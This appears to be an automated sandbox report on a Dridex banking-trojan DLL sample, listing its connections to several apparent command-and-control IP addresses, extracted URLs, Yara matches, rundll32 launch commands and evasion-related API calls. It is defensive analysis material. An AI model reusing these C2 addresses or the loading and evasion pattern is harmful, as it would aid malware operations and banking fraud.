                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:48 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:48 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:52 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:52 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:56 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:08:56 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:00 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:00 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:04 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:04 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:08 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:08 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:12 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:12 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:16 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:16 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:19 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:20 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:23 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:24 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:27 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:27 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:31 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:31 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:35 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:39 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:39 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:42 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:43 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:47 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:47 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:51 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:51 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:54 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:55 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:58 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:09:59 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:10:03 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.15.12 | Date: Thu, 28 Oct 2021 03:10:03 GMT | Content-Type: text/plain; charset=utf-8 | Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknown | TCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.3.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: rundll32.exe, 00000003.00000003.800119859.0000000005151000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.799281472.000000000514F000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?75268022b6a29
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214/c
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.816913953.000000000142C000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/%
                      Source: loaddll32.exe, 00000000.00000003.1178896990.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/0
                      Source: loaddll32.exe, 00000000.00000003.816913953.000000000142C000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/1
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/My
                      Source: loaddll32.exe, 00000000.00000003.920743516.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/P
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/S
                      Source: loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/em32
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/l
                      Source: loaddll32.exe, 00000000.00000003.1063082745.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/ll
                      Source: loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp | String found in binary or memory: https://143.244.140.214:808/ll1
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.920743516.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1028569401.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/v
                      Source: loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://143.244.140.214:808/w
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.811547591.000000000142C000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47/F
                      Source: loaddll32.exe, 00000000.00000003.811547591.000000000142C000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47/N
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/%
                      Source: loaddll32.exe, 00000000.00000003.837199003.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/&
                      Source: loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/0
                      Source: loaddll32.exe, 00000000.00000003.806428262.000000000142C000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/4.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/853
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/C
                      Source: loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/D
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/ES
                      Source: loaddll32.exe, 00000000.00000003.828785020.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/P
                      Source: loaddll32.exe, 00000000.00000003.953795452.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/Ps%
                      Source: loaddll32.exe, 00000000.00000003.995531404.0000000001428000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1178896990.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.970321561.0000000001429000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/#
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/$
                      Source: loaddll32.exe, 00000000.00000003.920743516.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/)
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/-
                      Source: loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp | String found in binary or memory: https://192.46.210.220/1
                      Source: loaddll32.exe, 00000000.00000003.937380465.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/5
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/9
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/E
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/GlobalSign
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/Google
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/L
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/N
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/O
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/W
                      Source: loaddll32.exe, 00000000.00000003.904619445.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000003.828785020.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/aenh.dllz
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/coro8
                      Source: loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/i
                      Source: loaddll32.exe, 00000000.00000003.1012124189.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1192983673.000000000142B000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/ography
                      Source: loaddll32.exe, 00000000.00000003.855700484.000000000142B000.00000004.00000001.sdmp | String found in binary or memory: https://192.46.210.220/r
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1096183295.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
                      Source: rundll32.exe, 00000003.00000002.1192429006.000000000099C000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/1$
                      Source: loaddll32.exe, 00000000.00000003.860275635.000000000142A000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/C
                      Source: loaddll32.exe, 00000000.00000003.896445896.0000000001429000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1045448367.000000000142B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.953795452.0000000001429000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: rundll32.exe, 00000003.00000002.1194600161.000000000514E000.00000004.00000001.sdmp | String found in binary or memory: https://45.77.0.96:6891/h.dlln
                      Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4865 Connection: Close Cache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4F39F9 InternetReadFile,
                      Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49760 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.4:49772 version: TLS 1.2

                      E-Banking Fraud:

                      Yara detected Dridex unpacked file
                      Source: Yara match | File source: 3.3.rundll32.exe.2f5db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.468db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.113db55.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.468db55.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.loaddll32.exe.113db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.445db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.2d5db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.3.rundll32.exe.2f5db55.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.loaddll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.3.rundll32.exe.445db55.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.3.rundll32.exe.2d5db55.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000003.00000002.1194868368.000000006E4C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000003.766529856.0000000002F40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.765489662.0000000004670000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000003.779791327.0000000002D40000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.790137281.0000000001120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1193417410.000000006E4C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000003.787445513.0000000004440000.00000040.00000001.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojan
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4D22A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4EBE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll | ReversingLabs: Detection: 20%
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll',#1
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engine | Classification label: mal84.bank.troj.evad.winDLL@11/2@0/4
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.5008.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.1370 | Joe Sandbox Cloud Basic: Detection: clean Score: 0
                      Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exe | Automated click: OK
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll | Static file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.5008.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb | source: loaddll32.exe, 00000000.00000002.1193920617.000000006E587000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1195365441.000000006E587000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.5008.dll
                      Source: C:\Windows\System32\loaddll32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exe | Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exe | Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4D3930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4ECEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.1192967377.000000000141E000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_6E5397B0 IsDebuggerPresent,IsDebuggerPresent,CreateThread,std::_Timevec::_Timevec,WaitForSingleObjectEx,
